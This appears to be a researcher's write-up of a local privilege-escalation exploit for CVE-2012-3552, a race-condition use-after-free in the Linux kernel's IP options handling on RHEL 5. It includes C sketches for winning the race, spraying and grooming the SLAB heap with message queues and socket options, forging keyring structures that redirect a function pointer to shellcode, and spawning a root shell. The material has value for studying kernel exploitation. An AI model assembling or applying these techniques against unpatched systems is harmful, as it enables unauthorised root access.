This is a brief walk-through of an old exploit I wrote for CVE-2012-3552. I've had these notes floating around for a long time but finally took the time to write them up properly. The exploit was targeting a RHEL 5 kernel, which is now ancient. Many, many exploitation mitigations have been added to the kernel since then, so a lot of the techniques used here no longer work. The overview of successfully exploiting the narrow race condition is, hopefully, still interesting.
- The fix
- The vulnerability
- Triggering the overflow
- Using the overflow
- Controlling the overflow
- Grooming the heap
- The final exploit
The fix
Commit f6d8bd051c391c1c0458a30b2a7abcd939329259 patched the vulnerability:
inet: add RCU protection to inet->opt
We lack proper synchronization to manipulate inet->opt ip_options
Problem is ip_make_skb() calls ip_setup_cork() and ip_setup_cork() possibly makes a copy of ipc->opt (struct ip_options), without any protection against another thread manipulating inet->opt.
Another thread can change inet->opt pointer and free old one under us.
Use RCU to protect inet->opt (changed to inet->inet_opt).
The opt member of struct inet_sock represents the IP options associated with a socket. As the patch description explains, there was no synchronization around the opt field, which could be exploited to trigger a use-after-free.
The CVE description mentions that this vulnerability might be triggered remotely. That may be possible, though I didn't fully investigate the claim; I was more interested in leveraging the bug for a local privilege escalation.
The vulnerability
We reach ip_setup_cork in the kernel by passing the MSG_MORE flag to the sendmsg syscall. This sets up corking for a UDP socket:
net/ipv4/ip_output.c
static int ip_setup_cork(struct sock *sk, struct inet_cork *cork,
			 struct ipcm_cookie *ipc, struct rtable **rtp)
{
	struct ip_options *opt;

	/* abridged */
	opt = ipc->opt;
	if (opt) {
		if (cork->opt == NULL) {                                /* (1) */
			cork->opt = kmalloc(sizeof(struct ip_options) + 40,
					    sk->sk_allocation);         /* (2) */
			if (unlikely(cork->opt == NULL))
				return -ENOBUFS;
		}
		memcpy(cork->opt, opt,
		       sizeof(struct ip_options) + opt->optlen);        /* (3) */
		...
	}
	...
}
When the kernel sets up corking for a socket, it makes a copy of the IP options. If no IP options have previously been set for corking (1), we allocate a new buffer to hold the options (2), then copy the current options into the newly allocated buffer (3). Unfortunately, there is no synchronization around the opt pointer: another kernel thread may free opt between (2) and (3), causing the use-after-free.
We can use this use-after-free to trigger memory corruption. In (3), the opt->optlen field determines the length of the options to copy. By placing a large value in opt->optlen, we can cause a heap buffer overflow. But can we win the race condition? Can we control the heap layout precisely enough to overwrite something important and gain root? Let's find out!
Triggering the overflow
The existing IP options for a socket can be replaced by calling setsockopt with the IP_OPTIONS option. After the new IP options are set (4), the existing IP options are freed (5):
net/ipv4/ip_sockglue.c
static int do_ip_setsockopt(struct sock *sk, int level,
			    int optname, char __user *optval, int optlen)
{
	...
	case IP_OPTIONS:
	{
		struct ip_options *opt = NULL;

		if (optlen > 40 || optlen < 0)
			goto e_inval;
		err = ip_options_get_from_user(sock_net(sk), &opt,
					       optval, optlen);
		if (err)
			break;
		...
		opt = xchg(&inet->opt, opt);                            /* (4) */
		kfree(opt);                                             /* (5) */
		break;
	}
	...
}
The basic outline of our exploit will use two userspace threads calling sendmsg and setsockopt repeatedly on the same socket. In sketch form, with error handling and setup elided:
static int sock;			/* connected UDP socket */
static unsigned char opts[40];		/* valid IP options buffer */

static void *cork_thread(void *arg)
{
	char byte = 0;
	struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
	struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1 };

	(void)arg;
	pin_to_cpu(1);		/* sched_setaffinity() helper, see below */
	for (;;) {
		sendmsg(sock, &msg, MSG_MORE);	/* reaches ip_setup_cork() */
		sendmsg(sock, &msg, 0);		/* flush so the next call corks again */
	}
}

static void *setsockopt_thread(void *arg)
{
	(void)arg;
	pin_to_cpu(0);
	for (;;)		/* each call frees the previous options */
		setsockopt(sock, IPPROTO_IP, IP_OPTIONS, opts, sizeof(opts));
}
The exploit aims to achieve this interleaving of events in kernelspace to trigger the overflow:
parent (CPU 0) | child (CPU 1)
--------------------------------|--------------------------------
| /* ip_setup_cork:
| * set up IP options
| * for corked message
| */
| cork->opt = kmalloc(
| sizeof(struct ip_options) + 40,
| sk->sk_allocation
| );
|
/* do_ip_setsockopt: |
* free IP options and |
* create hole in the heap |
*/ |
ip_options_get_from_user( |
sock_net(sk), |
&opt, |
optval, |
optlen |
); |
... |
xchg( |
&inet->opt, |
opt |
); |
|
|
/* TODO: trigger another kernel |
* allocation to overwrite |
* `opt` with an invalid |
* `->optlen` field |
*/ |
|
| /* ip_setup_cork:
| * malformed IP options
| * triggers overflow
| */
| memcpy(
| cork->opt,
| opt,
| sizeof(struct ip_options)
| + opt->optlen
| );
We use sched_setaffinity(2) to hint to the kernel that these two threads should run on different CPU cores (a minimal pinning helper is sketched below). This helps in two ways:
- we increase the chance that ip_setup_cork and do_ip_setsockopt run concurrently
- we gain greater control over the layout of the kernel heap, because the kernel allocator uses a number of per-CPU caches that influence the behavior of kmalloc and kfree
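For reference, a minimal sketch of the pinning helper (the name pin_to_cpu is mine):

#define _GNU_SOURCE
#include <sched.h>

static void pin_to_cpu(int cpu)
{
	cpu_set_t set;

	CPU_ZERO(&set);
	CPU_SET(cpu, &set);
	/* pid 0 means the calling thread; this is a hint, not a guarantee */
	sched_setaffinity(0, sizeof(set), &set);
}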
Even with pinning threads to separate CPUs, I needed ~100,000 iterations on my test machine to reliably trigger the use after free and subsequent memory corruption.
Using the overflow
The target kernel uses the SLAB allocator, which influences how kmalloc and kfree behave. The SLAB allocator aims to reduce the fragmentation caused by different-sized allocations being serviced from a single heap. A number of caches are defined which service allocations for common types, e.g. struct task_struct, struct mm_struct, etc.
There are also a number of general-purpose caches used for generic allocations: the size-32, size-64 and size-128 caches hold allocations of up to 32, 64 and 128 bytes respectively. SLAB allocation is also CPU-efficient because, as each allocation in a specific cache is the same size, there is no need to maintain complex metadata for each allocation. Instead, allocation metadata is stored at the beginning of the slab and there is no metadata between individual allocations. This simplifies our exploit as we don't need to worry about corrupting any heap metadata.
Here is a rough sketch of how we want to use this overflow. First we'll groom the kernel heap to place our exploit data (AAAA) and victim allocation in the size-64 cache, both preceded by a free block (....).
The heap will look like this, initially:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| .... | AAAAAAAAAA | | .... | victim |
| .... | AAAAAAAAAA | | .... | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
We will then use setsockopt to place an ip_options structure in one of the free blocks:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| opt | AAAAAAAAAA | | .... | victim |
| | AAAAAAAAAA | | .... | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
By starting corking on an existing socket, a new ip_options structure (cork->opt from ip_setup_cork) will be allocated in the free block preceding our victim allocation:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| opt | AAAAAAAAAA | | cork-> | victim |
| | AAAAAAAAAA | | opt | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
We then use the IP_OPTIONS socket option to free the existing opt structure:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| .... | AAAAAAAAAA | | cork-> | victim |
| .... | AAAAAAAAAA | | opt | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
Next, we trigger any syscall that lets us allocate a buffer in the size-64 cache. When interpreted as an ip_options structure, this allocation will have an invalid length field:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| fake | AAAAAAAAAA | | cork-> | victim |
| opt | AAAAAAAAAA | | opt | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
The memcpy in ip_setup_cork then runs, using the invalid length field and overwriting both the cork->opt allocation and the victim allocation:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| fake | AAAAAAAAAA | | fake | AAAAAAAAAA |
| opt | AAAAAAAAAA | | opt | AAAAAAAAAA |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
This sketch, obviously, requires a lot of heap grooming, which we'll come back to later.
Controlling the overflow
We now need two things to put the exploit together:
- a method of allocating a fake ip_options structure in the size-64 cache that lets us control the ->optlen field
- a victim allocation that will give us privileges when overwritten.
The fake ip_options structure
To allocate the fake ip_options structure in the size-64 cache, we need a kernel allocation of between 33 and 64 bytes that we can trigger from userspace without many restrictions on its contents. There are many different ways to do this, but I settled on the IP_MSFILTER option to setsockopt. This option controls multicast source filtering:
net/ipv4/ip_sockglue.c
	case IP_MSFILTER:
	{
		struct ip_msfilter *msf;

		if (optlen < IP_MSFILTER_SIZE(0))
			goto e_inval;
		...
		msf = kmalloc(optlen, GFP_KERNEL);                      /* (6) */
		if (!msf) {
			err = -ENOBUFS;
			break;
		}
		err = -EFAULT;
		if (copy_from_user(msf, optval, optlen)) {              /* (7) */
			kfree(msf);
			break;
		}
		if (msf->imsf_numsrc >= 0x3ffffffcU ||
		    msf->imsf_numsrc > sysctl_igmp_max_msf) {
			kfree(msf);                                     /* (8) */
			err = -ENOBUFS;
			break;
		}
		...
	}
It allows us to allocate memory of an arbitrary size (6), copy our data into the allocation (7), then immediately free it (8) by failing some basic validation. Apart from the constraint on the imsf_numsrc field needed to trigger the error path, there is no limit on the contents of our allocation.
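In userspace, the spray might look like this sketch (the name spray_size64 is mine; the offset of imsf_numsrc follows the layout of struct ip_msfilter):

#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>

#ifndef IP_MSFILTER
#define IP_MSFILTER 41
#endif

/* Place 64 controlled bytes in (and immediately back out of) the
 * size-64 cache via the IP_MSFILTER error path. Bytes 12-15 overlap
 * imsf_numsrc and are sacrificed: the huge value fails validation, so
 * the kernel kfree()s the buffer straight after copying it in. */
static void spray_size64(int s, const unsigned char payload[64])
{
	unsigned char buf[64];
	unsigned int numsrc = 0x40000000;	/* fails the numsrc checks */

	memcpy(buf, payload, sizeof(buf));
	memcpy(&buf[12], &numsrc, sizeof(numsrc));	/* imsf_numsrc */

	/* fails with ENOBUFS by design; we only want the transient
	 * kmalloc + copy_from_user + kfree in the kernel */
	setsockopt(s, IPPROTO_IP, IP_MSFILTER, buf, sizeof(buf));
}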
The victim allocation
We are looking for something that is allocated on the size-64 cache and contains something useful to us when overwritten, e.g. a function pointer or pointer to data. The allocation also needs to be allocatable on demand so we can easily arrange the heap.
I settled on the thread_group_cred structure for this exploit. The structure represents generic "credentials" for a process, including things like cryptographic keys and authentication tokens, which can be accessed via the add_key, request_key and keyctl syscalls. The structure is allocated when forking a new process, so it is easy for us to allocate on demand.
include/linux/cred.h
struct thread_group_cred {
	atomic_t	usage;
	pid_t		tgid;			/* thread group process ID */
	spinlock_t	lock;
	struct key	*session_keyring;	/* keyring inherited over fork */
	struct key	*process_keyring;	/* keyring private to this process */
	struct rcu_head	rcu;			/* RCU deletion hook */
};
The process_keyring and session_keyring members point to key structures:
include/linux/key.h
struct key {
	atomic_t		usage;		/* number of references */
	key_serial_t		serial;		/* key serial number */
	...
	struct key_type		*type;		/* type of key */
	...
};
The credential infrastructure in the kernel is fairly generic and the exact implementation is determined by the struct key_type, which contains a table of function pointers:
include/linux/key-type.h
struct key_type {
	const char *name;
	...
	int (*instantiate)(struct key *key, const void *data, size_t datalen);
	int (*update)(struct key *key, const void *data, size_t datalen);
	...
};
The keyctl syscall allows a process to perform several generic operations on the current process's credentials, each implemented through the type table of function pointers. In our exploit we can use the KEYCTL_UPDATE operation to call through the ->update function pointer (9) to our shellcode:
security/keys/key.c
int key_update(key_ref_t key_ref, const void *payload, size_t plen)
{
	struct key *key = key_ref_to_ptr(key_ref);
	int ret;

	...
	ret = -EOPNOTSUPP;
	if (key->type->update) {
		down_write(&key->sem);
		ret = key->type->update(key, payload, plen);            /* (9) */
		...
		up_write(&key->sem);
	}
	...
	return ret;
}
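From userspace, the victim can reach this path with something like the following sketch (the helper name is mine; the constants come from <linux/keyctl.h>):

#include <stddef.h>
#include <sys/syscall.h>
#include <unistd.h>

#define KEYCTL_UPDATE             2
#define KEY_SPEC_PROCESS_KEYRING -2

static long trigger_update(const void *payload, size_t plen)
{
	/* the kernel resolves the (soon-to-be corrupted) process keyring
	 * and key_update() calls key->type->update(key, payload, plen) */
	return syscall(__NR_keyctl, KEYCTL_UPDATE, KEY_SPEC_PROCESS_KEYRING,
		       payload, plen);
}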
There are a couple of levels of indirection from our overflowed thread_group_cred structure to the update function pointer. We can handle this by constructing fake key and key_type structures in userspace, then overflowing the ->process_keyring field to point back to userspace:
userspace:
/--> struct key:
| ...
| type: ----\
| ... |
| \--> struct key_type:
| ...
| update: --------> shellcode
| ...
|
|
|
-----------------------------+--------------------------------------------------
kernelspace: |
|
struct thread_group_cred: |
... |
process_keyring: --------/
...
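In code, the userspace setup might look like this sketch; the two offsets are placeholders that would need to match the target kernel's struct key and struct key_type layouts:

#include <string.h>

#define KEY_TYPE_OFF     16	/* placeholder: offsetof(struct key, type) */
#define TYPE_UPDATE_OFF  40	/* placeholder: offsetof(struct key_type, update) */

static unsigned char fake_key[256];
static unsigned char fake_key_type[256];

/* Build a fake struct key whose ->type->update points at our shellcode.
 * Both structures live in user memory; the overflow only has to plant
 * the address of fake_key in tgcred->process_keyring. */
static void build_fake_creds(void *shellcode)
{
	void *type = fake_key_type;

	memset(fake_key, 0, sizeof(fake_key));
	memset(fake_key_type, 0, sizeof(fake_key_type));

	memcpy(fake_key + KEY_TYPE_OFF, &type, sizeof(type));
	memcpy(fake_key_type + TYPE_UPDATE_OFF, &shellcode, sizeof(shellcode));
}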
The exploit data
We need another allocation on the size-64 cache which lets us control the bytes that we overwrite the thread_group_cred structure with. Of course, there is already a way of allocating on the size-64 cache: IP options! We just need to ensure that we construct a valid IP options buffer that, when interpreted as a thread_group_cred structure, gives us control over the process_keyring field. The raw IP options data passed from userspace is prefixed with the ip_options structure, which makes this approach a little less flexible.
We can use the pahole tool to dump the sizes and offsets of the fields in the two structures, confirming that the process_keyring member (at offset 24) lies after the prefixed IP options header (12 bytes in total):
struct ip_options {
__be32 faddr; /* 0 4 */
unsigned char optlen; /* 4 1 */
unsigned char srr; /* 5 1 */
unsigned char rr; /* 6 1 */
unsigned char ts; /* 7 1 */
unsigned char is_strictroute:1; /* 8: 0 1 */
unsigned char srr_is_hit:1; /* 8: 1 1 */
unsigned char is_changed:1; /* 8: 2 1 */
unsigned char rr_needaddr:1; /* 8: 3 1 */
unsigned char ts_needtime:1; /* 8: 4 1 */
unsigned char ts_needaddr:1; /* 8: 5 1 */
/* XXX 2 bits hole, try to pack */
unsigned char router_alert; /* 9 1 */
unsigned char cipso; /* 10 1 */
unsigned char __pad2; /* 11 1 */
unsigned char __data[]; /* 12 0 */
/* size: 12, cachelines: 1, members: 15 */
/* sum members: 11 */
/* sum bitfield members: 6 bits, bit holes: 1, sum bit holes: 2 bits */
/* last cacheline: 12 bytes */
};
struct thread_group_cred {
atomic_t usage; /* 0 4 */
pid_t tgid; /* 4 4 */
spinlock_t lock; /* 8 4 */
/* XXX 4 bytes hole, try to pack */
struct key * session_keyring; /* 16 8 */
struct key * process_keyring; /* 24 8 */
struct rcu_head rcu; /* 32 16 */
/* size: 48, cachelines: 1, members: 6 */
/* sum members: 44, holes: 1, sum holes: 4 */
/* last cacheline: 48 bytes */
};
We just need to find an IP option that gives us flexible control from offset 12 through 64. The IP_OPTIONS socket option is handled by ip_options_compile and there is, by design, very little validation of an IPOPT_RA ("Router Alert") option.
net/ipv4/ip_options.c
int ip_options_compile(struct net *net,
		       struct ip_options *opt, struct sk_buff *skb)
{
	...
	      case IPOPT_RA:
		if (optlen < 4) {
			pp_ptr = optptr + 1;
			goto error;
		}
		if (optptr[2] == 0 && optptr[3] == 0)
			opt->router_alert = optptr - iph;
		break;
	...
}
In diagram form, we can more easily see that the router alert option gives us control over the two keyring fields:
byte offset:        0        4        8        12       16                24
thread_group_cred:  [usage  ][tgid   ][lock   ][...    ][session_keyring ][process_keyring ]
IP options:         [struct ip_options        ][router alert option                        ]
We don't directly control the bytes up to offset 12 because of the prefixed ip_options header, so we'll clobber the usage, tgid and lock fields when triggering the overflow. This didn't seem to have any adverse effects in testing, and can be fixed up by our shellcode later.
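Putting the offsets together, building and installing the fake thread_group_cred might look like this sketch (the name set_fake_tgcred is mine; 8-byte kernel pointers are assumed):

#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>

#ifndef IPOPT_RA
#define IPOPT_RA 148	/* router alert option type */
#endif

static void set_fake_tgcred(int s, const void *fake_key_addr)
{
	unsigned char ra[40];

	memset(ra, 0, sizeof(ra));
	ra[0] = IPOPT_RA;	/* barely validated by ip_options_compile */
	ra[1] = sizeof(ra);	/* one option spanning the whole buffer */
	/* ra[2] and ra[3] must stay zero to pass validation */

	/* the 12-byte ip_options header precedes __data, so kernel offset
	 * 16 (session_keyring) is ra[4] and offset 24 (process_keyring)
	 * is ra[12] */
	memcpy(&ra[4],  &fake_key_addr, sizeof(fake_key_addr));
	memcpy(&ra[12], &fake_key_addr, sizeof(fake_key_addr));

	setsockopt(s, IPPROTO_IP, IP_OPTIONS, ra, sizeof(ra));
}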
To summarize our exploit up to now:
- we construct fake key and key_type structures in userspace pointing to our shellcode
- we allocate a fake thread_group_cred structure on the kernel heap by attaching a router alert IP option to an existing socket
- we fork a new victim process to allocate our victim thread_group_cred structure on the heap
- we arrange the heap so we have the appropriate gaps before the real and fake thread_group_cred structures
- we interleave sendmsg and setsockopt to trigger the overflow and overwrite the thread_group_cred structure
- finally, the victim process calls keyctl(KEYCTL_UPDATE, ...) to use the corrupted thread_group_cred structure and trigger kernel code execution via the ->update function pointer (sketched below)
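In sketch form, the victim process might look like this (the helper names are mine, trigger_update is the sketch from earlier, and the shellcode is assumed to fix up the victim's credentials so that getuid() returns 0):

#include <signal.h>
#include <sys/types.h>
#include <unistd.h>

static unsigned char payload[4];	/* contents are irrelevant here */

static void on_overflow_done(int sig)
{
	(void)sig;

	/* walks the corrupted ->process_keyring into our fake structures */
	trigger_update(payload, sizeof(payload));

	if (getuid() == 0)			/* shellcode did its job */
		execl("/bin/sh", "sh", (char *)NULL);
	_exit(1);
}

static pid_t spawn_victim(void)
{
	pid_t pid = fork();

	if (pid == 0) {
		/* the fork itself allocates the victim thread_group_cred
		 * on the size-64 cache */
		signal(SIGUSR1, on_overflow_done);
		for (;;)
			pause();	/* wait for the parent's signal */
	}
	return pid;
}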
Grooming the heap
The whole exploit hinges on our ability to precisely groom the kernel heap. As mentioned, the kernel I'm testing on is using the default SLAB allocator. The SLAB allocator is structured like so:
- the allocator uses different caches to service different allocation requests
- each individual cache holds items of a specific type (or a specific size, for the generic size-N caches)
- a cache is backed by one or more slabs
- each slab provides a portion of contiguous memory to allocate objects from, and is prefixed with allocation metadata
In diagram form:
size-32 cache:
|
| +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata | | .. | | | .. | .. | .. | | | |
| +----------+----+----+----+----+----+----+----+----+----+----+
|
| +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata | .. | .. | .. | | | | .. | | .. | |
+----------+----+----+----+----+----+----+----+----+----+----+
size-64 cache:
|
| +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata | | | | | .. | | | | | |
| +----------+----+----+----+----+----+----+----+----+----+----+
|
| +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata | | | .. | | | | .. | | | |
| +----------+----+----+----+----+----+----+----+----+----+----+
|
| +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata | | | | | | | | .. | .. | .. |
+----------+----+----+----+----+----+----+----+----+----+----+
The slabs become dirty over time, accumulating a mixture of in-use and free slots, as different subsystems with differing allocation patterns use the same caches. Our exploit relies on a very precise layout of objects on a single slab, so these dirty slabs are a problem for us.
Fresh slabs are allocated once all existing slabs have been filled. We can force the creation of a new, clean slab by allocating a large number of objects on the size-64 cache. Once we have a clean slab, the allocation pattern is deterministic on this old RHEL 5 kernel.
Luckily, the target RHEL 5 kernel exposes the /proc/slabinfo file to unprivileged users. This file gives an overview of the current state of the various caches:
$ cat /proc/slabinfo
# name <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <limit> <batchcount> <sharedfactor> : slabdata <active_slabs> <num_slabs> <sharedavail>
...
size-192 108 120 192 20 1 : tunables 120 60 8 : slabdata 6 6 0
size-128(DMA) 0 0 128 30 1 : tunables 120 60 8 : slabdata 0 0 0
size-128 316 330 128 30 1 : tunables 120 60 8 : slabdata 11 11 0
size-96(DMA) 0 0 128 30 1 : tunables 120 60 8 : slabdata 0 0 0
size-96 598 600 128 30 1 : tunables 120 60 8 : slabdata 20 20 0
size-64(DMA) 0 0 64 59 1 : tunables 120 60 8 : slabdata 0 0 0
size-32(DMA) 0 0 32 113 1 : tunables 120 60 8 : slabdata 0 0 0
size-64 2533 2773 64 59 1 : tunables 120 60 8 : slabdata 47 47 0
size-32 22040 22939 32 113 1 : tunables 120 60 8 : slabdata 203 203 0
kmem_cache 170 180 256 15 1 : tunables 120 60 8 : slabdata 12 12 0
...
By parsing this output while allocating objects in kernelspace, we can infer precisely when a new size-64 slab is allocated.
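A sketch of the parsing (the name size64_num_objs is mine; the same routine can detect unexpected allocations by other processes):

#include <stdio.h>

/* Read num_objs for the size-64 cache from /proc/slabinfo. A jump of
 * objperslab (59 here) means a fresh slab was just allocated; any other
 * unexpected change means someone else is allocating on our cache. */
static int size64_num_objs(void)
{
	char line[256];
	int active = 0, num = 0;
	FILE *f = fopen("/proc/slabinfo", "r");

	if (!f)
		return -1;
	while (fgets(line, sizeof(line), f)) {
		/* the literal match fails on the "size-64(DMA)" line */
		if (sscanf(line, "size-64 %d %d", &active, &num) == 2)
			break;
	}
	fclose(f);
	return num;
}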
We now need a method of allocating a large number of objects in the size-64 cache. Depending on the uptime and load of the system, we may need to make many hundreds of allocations to completely fill the existing slabs. We can use POSIX message queues to do this. POSIX message queues allow a process to send data to another process on the same machine via mq_send(3) and mq_receive(3). If a process sends a message while no other process is ready to receive it, the message is copied into the kernel and placed on a message queue. Messages can be of an arbitrary size, and we can choose a specific message length to force the allocations to be served from the size-64 cache.
On my test kernel, the number of message queues is limited to a maximum of 256, each containing a maximum of 10 messages. Assuming no message queues already exist, we can make 256 * 10 = 2560 allocations before reaching these limits. With 59 allocations needed to fill a size-64 slab, this is enough to completely fill 43 slabs. We can increase this number, though, using the priority system for messages.
Messages in each queue carry a priority that determines the order in which they are received from the queue. Internally, messages are sorted by priority in a red-black tree, with each node in the tree holding a list of messages of the same priority. Coincidentally, the nodes in the red-black tree are also allocated from the size-64 cache. By sending each message with a unique priority, we can construct a red-black tree with 9 nodes containing our 10 messages. This now allows us to trigger (256 * (10 + 9)) = 4864 allocations, enough to completely fill 82 size-64 slabs.
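A sketch of the spray (the names and MSG_LEN are mine; MSG_LEN must be chosen so that the kernel-side message allocation, header plus payload, is served from the size-64 cache):

#include <fcntl.h>
#include <mqueue.h>
#include <stdio.h>

#define MSG_LEN    8	/* assumption: header + payload lands in size-64 */
#define QUEUES     256
#define PER_QUEUE  10

/* link with -lrt */
static void fill_size64_slabs(void)
{
	char name[32], msg[MSG_LEN] = { 0 };
	struct mq_attr attr = {
		.mq_maxmsg  = PER_QUEUE,
		.mq_msgsize = MSG_LEN,
	};

	for (int q = 0; q < QUEUES; q++) {
		snprintf(name, sizeof(name), "/groom-%d", q);
		mqd_t mq = mq_open(name, O_CREAT | O_WRONLY, 0600, &attr);

		/* a unique priority per message also forces extra
		 * tree-node allocations from the size-64 cache */
		for (unsigned int prio = 0; prio < PER_QUEUE; prio++)
			mq_send(mq, msg, sizeof(msg), prio);
	}
}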
For the sake of brevity, I won't go into the full details of how to arrange the new slab in the right layout. Briefly, though, we can groom the precise layout of the fresh slab by sending and receiving 64-byte messages via a POSIX message queue, forking new processes to allocate the victim thread_group_cred structures, then allocating our fake thread_group_cred structure using setsockopt. A rough sketch follows.
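Purely as an illustration, one grooming pass might look like this, reusing the helpers sketched earlier (the exact send/receive pattern is the detail elided above):

static void groom_fresh_slab(int s)
{
	/* 1. fill the dirty size-64 slabs until /proc/slabinfo shows a
	 *    fresh one (size64_num_objs() jumps by one slab's worth) */
	fill_size64_slabs();

	/* 2. lay down placeholder messages that are later received to
	 *    punch the free blocks ('....' in the earlier diagrams) */

	/* 3. fork so the victim thread_group_cred lands next to a hole */
	spawn_victim();

	/* 4. place the fake thread_group_cred (router alert IP options)
	 *    next to another hole */
	set_fake_tgcred(s, fake_key);
}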
But what about other processes on the machine? Won't they accidentally interfere with our heap grooming? This is possible, but there are a couple of things that help us.
Firstly, the /proc/slabinfo output gives very precise information about the number of objects allocated, so we can infer whether another process has allocated on our slab. This allows us to re-groom the heap before triggering the overflow.
Secondly, the SLAB allocator has a number of optimizations for SMP machines that help us precisely control the heap layout. When a slab is first allocated, a number of objects (cachep->num) are reserved on the per-CPU LIFO (ac->entry) via cache_alloc_refill (10):
mm/slab.c
static void *cache_alloc_refill(struct kmem_cache *cachep, gfp_t flags)
{
	...
	while (slabp->inuse < cachep->num && batchcount--) {
		...
		ac->entry[ac->avail++] = slab_get_obj(cachep, slabp,    /* (10) */
						      node);
	}
	...
}
When objects are allocated from this cache, they are pulled from the per-CPU LIFO if available (11):
mm/slab.c
static inline void *____cache_alloc(struct kmem_cache *cachep, gfp_t flags)
{
	void *objp;
	struct array_cache *ac;

	ac = cpu_cache_get(cachep);
	if (likely(ac->avail)) {
		ac->touched = 1;
		objp = ac->entry[--ac->avail];                          /* (11) */
	} else {
		...
		objp = cache_alloc_refill(cachep, flags);
	}
	return objp;
}
And when an object is freed, it is placed back on the per-CPU LIFO (12):
mm/slab.c
static inline void __cache_free(struct kmem_cache *cachep, void *objp)
{
	struct array_cache *ac = cpu_cache_get(cachep);

	...
	if (likely(ac->avail < ac->limit)) {
		...
		ac->entry[ac->avail++] = objp;                          /* (12) */
		return;
	} else {
		cache_flusharray(cachep, ac);
		ac->entry[ac->avail++] = objp;
	}
}
This is done for performance reasons, but it actually helps our exploit: the beginning of the newly created slab is reserved for servicing allocations from the current CPU. Because we have previously pinned our exploit threads to specific CPUs, we have a higher chance of allocating objects from this piece of contiguous memory at the beginning of the slab. And as our exploit threads run in a tight loop, constantly allocating and freeing objects via setsockopt and sendmsg, the per-CPU LIFO also helps ensure that the same objects are reused on each iteration of the respective loops.
All that being said, the exploit is not 100% stable, because we are at the mercy of sched_setaffinity(2) correctly pinning our exploit threads to specific CPUs. This is not guaranteed; the setting is merely a hint to the kernel. Other processes on the same machine may also allocate from the size-64 cache. The /proc/slabinfo output, though, gives us fairly good visibility into the state of the size-64 cache, and we can abort an exploit attempt if we detect any unexpected allocations.
The final exploit
Putting it all together, our exploit first grooms the kernel heap using POSIX message queues and sets up a specific pattern of allocations on the newly allocated slab. We then run our exploit threads until we trigger this specific sequence of events in kernelspace:
parent (CPU 0) | child (CPU 1)
| /* ip_setup_cork:
| * set up IP options
| * for corked message
| */
| cork->opt = kmalloc(
| sizeof(struct ip_options) + 40,
| sk->sk_allocation
| );
|
/* do_ip_setsockopt: |
* free IP options and |
* create hole in the heap |
*/ |
ip_options_get_from_user( |
sock_net(sk), |
&opt, |
optval, |
optlen |
); |
... |
xchg( |
&inet->opt, |
opt |
); |
|
|
/* do_ip_setsockopt: |
* immediately fill hole  |
* with malformed IP options |
*/ |
msf = kmalloc( |
optlen, |
GFP_KERNEL |
); |
... |
copy_from_user( |
msf, |
optval, |
optlen |
) |
| /* ip_setup_cork:
| * malformed IP options
| * triggers overflow into
| * key structure
| */
| memcpy(
| cork->opt,
| opt,
| sizeof(struct ip_options)
| + opt->optlen
| );
|
|
|
| /*
| * trigger execution via
| * corrupted key structure
| * with keyctl(KEYCTL_UPDATE)
| */
| key->type->update(
| key,
| payload,
| plen
| );
🍨